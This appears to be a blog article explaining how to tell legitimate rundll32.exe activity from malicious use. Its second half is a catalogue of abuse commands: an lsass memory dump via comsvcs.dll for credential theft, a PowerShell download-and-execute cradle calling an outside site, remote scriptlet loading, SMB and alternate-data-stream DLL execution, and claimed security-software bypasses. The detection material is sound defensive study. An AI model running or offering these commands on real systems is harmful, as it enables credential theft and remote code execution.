Malware authors often write malware that mimics legitimate Windows processes. Therefore, we may see malware disguised as svchost.exe, rundll32.exe, or lsass.exe processes, taking advantage of the fact that most Windows users may not be aware of the behavior of these system processes under normal circumstances. In this article, we will dig deeper into rundll32.exe to gain some understanding of it.
- About Rundll.exe
As the name suggests, the rundll32.exe executable file is used to run a DLL (RUN DLL), that is, to run a dynamic link library.
In MSDN, the definition of DLL is as follows:
A dynamic link library (DLL) is a module that contains functions and data that can be used by another module (an application or DLL).
The following is the most basic syntax for using rundll32.exe:
- rundll32
The rundll32.exe executable can be a child process or a parent process, depending on the context of execution. In order to determine whether an instance of rundll32.exe is malicious, we need to confirm a few things. First, you need to confirm the path to launch it, and secondly, the command line.
The legitimate RUNDLL32.EXE process is always located at:
\Windows\System32\rundll32.exe
\Windows\SysWOW64\rundll32.exe (32-bit version on 64-bit systems)
As for the command line of the rundll32.exe instance, it all depends on what you want to run, such as CPL files, DLL installation, etc.
Below we will introduce in detail a series of rundll32.exe calls and their corresponding functions.
Case:
- SHELL32.DLL – “OpenAs_RunDLL”
Rundll32.exe can also execute specific functions in the DLL. For example, when you select a file and right-click, a context menu appears with several options. One option here is "OpenWith". After clicking, a pop-up window will appear where you can choose from the applications installed on your system.
Behind this process, shell32.dll and the OpenAs_RunDL function are used to start the rundll32.exe utility, which is actually equivalent to executing the following command in the background:
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL < file_path >Take modifying the hosts file as an example. Execute the following command through WIN+R to pop up the selection window:
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts 
This behavior of calling specific functions in a DLL is very common, so we may not be able to fully understand all functions.
- SHELL32.DLL – “Control_RunDLL”
Another common function we found to be used with shell32.dll was Control_RunDLL or Control_RunDLLAsUser. These two functions are used to run .CPL files or control panel options.
For example, if we want to change the computer's date and time, we can launch the corresponding applet from the Control Panel.
Behind the scenes, Windows actually starts an instance of rundll32.exe using the following command line.
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cplTurn on the firewall:
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\firewall.cpl 
Obviously, the CPL file here can also be replaced with a malicious file, so once a suspicious path and file name appears, we need to use other tools to check its legitimacy.
In addition to checking the .CPL file, when using the Control_RunDLL or Control_RunDLLAsUser function, you should also check the validity of the pointed .DLL file.
- DLL file call
If an attacker uses a legitimate DLL file to complete attack activities, traditional detection methods will indeed greatly increase the difficulty of defense. For example, using the MiniDump function in comsvcs.dll to dump the memory of the target process to achieve credential theft, refer to here :
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp fullSimilarly, there is advpack.dll, which was originally used to help hardware and software read and verify .INF files. It can also be used by attackers for code execution. Please refer to here:
c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\360\360.png,DefaultInstallOf course, there will definitely be many variants of these attack methods in actual use, which are used to bypass some conventional detection methods. For example, the call to the MiniDump function can also be completed through number #24. Interested friends can take a look here:
- Execute DLL from SMB share
rundll32.exe \\10.10.10.10\share\payload.dll,EntryPointUse Rundll32.exe to execute the DLL from an SMB share. EntryPoint is the name of the entry point in the .DLL file to be executed.
Use case: Executing DLL from SMB share.
Required permissions: User
Operating system: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute JavaScript script
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://www.chwm.vip/');")Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script downloaded from a remote website.
Use case: Code execution from the Internet
Required permissions: User
Operating system: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute an external program
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");Use Rundll32.exe to execute the JavaScript script that runs calc. EXE.
Use Case: Agent Execution
Required Permissions: User
Operating System: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute run external program and kill rundll32.exe process
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}Use Rundll32.exe to execute the JavaScript script that runs calc.exe and kill the started Rundll32.exe process.
Use Case: Agent Execution
Required Permissions: User
Operating System: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute a remote JavaScript script
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.chwm.vip/test/test.js")Use Rundll32.exe to execute JavaScript scripts that call remote JavaScript.
Use case: Code execution from the Internet
Required permissions: User
Operating system: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute VBScript script code
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";window.execScript("msgbox('a')","vbs");window.close()Use Rundll32.exe to execute the calling VBScript script.
Use Case: Agent Execution
Required Permissions: User
Operating System: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Load a registered or hijacked COM server
rundll32.exe –localserver < CLSID_GUID >
rundll32.exe –sta < CLSID_GUID >Use Rundll32.exe to load a registered or hijacked COM server payload. Also works with ProgID.
Both can be used to load maliciously registered COM objects.
Need to verify the corresponding registry key\HKEY_CLASSES_ROOT\CLSID\
It is recommended that you read the following article to learn more about this technology.
https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
Use case: Execute DLL/EXE COM server load or ScriptletURL code.
Required permissions: User
Operating system: Windows 10 (and possibly previous versions), Windows 11
- Execute commands to bypass security software
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exeThis is the result of disassembly and analysis of Url.dll, which can successfully bypass most security software.
Use Case: Agent Execution
Required Permissions: User
Operating System: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Alternate data stream
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMainUse Rundll32.exe to execute .DLL files that are stored in the Alternate Data Stream (ADS).
Use case: Execute code from an alternate data stream
Required permissions: User
Operating system: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute HTML code
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication < HTML Code >Use Rundll32.exe to call mshtml.dll to run HTML code.
Use Case: Agent Execution
Required Permissions: User
Operating System: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Summarize
Thank you for reading. I hope you can learn more about Rundll32.exe through this article.
There are more ways to exploit Rundll32.exe, and this article will be continuously updated. . .